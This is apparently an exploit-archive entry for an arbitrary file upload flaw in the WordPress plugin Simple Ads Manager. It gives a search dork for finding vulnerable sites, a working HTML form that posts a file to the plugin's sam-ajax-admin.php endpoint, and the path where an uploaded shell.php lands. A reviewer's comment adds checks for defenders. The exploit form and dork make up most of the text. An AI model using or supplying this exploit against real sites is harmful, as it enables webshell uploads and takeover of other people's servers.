# Title : Wordpress plugin Simple Ads Manager - Arbitrary File Upload
#Author : Tu5b0l3d
# Date : 05/04/2015
#Dork: inurl:/wp-content/plugins/simple-ads-manager/
# CSRF: simpan dengan file.html
# PoC code (HTML form posting to the plugin's PHP endpoint):
<!--
  Proof-of-concept request for the reported arbitrary file upload: a
  multipart/form-data POST sent straight to the plugin's sam-ajax-admin.php,
  with action=upload_ad_image, a caller-supplied "path" value and the file
  in "uploadfile".

  NOTE(review): the form is a standalone page and carries no nonce or session
  field, so the affected handler presumably does not check authentication,
  capability or a nonce, and does not restrict the file type or the "path"
  value. Confirm this against the plugin source for the installed version.

  Defender checks: update or remove the plugin; deny direct web access to
  sam-ajax-admin.php where it is not needed; disable PHP execution in
  directories that accept uploads; review access logs for POSTs to this
  script and look for unexpected .php files under the plugin directory.
-->
<form enctype="multipart/form-data"
action="http://target.com/wp-content/plugins/simple-ads-manager/sam-ajax-admin.php" method="post">
<input type="text" name="path"><input name="uploadfile" type="file" />
<input name="action" type="hidden" value="upload_ad_image">
<input type="submit" value="upload">
</form>
# sumber:
http://1337day.com/exploit/23465
path shell:
http://site.com/wp-content/plugins/simpl.../shell.php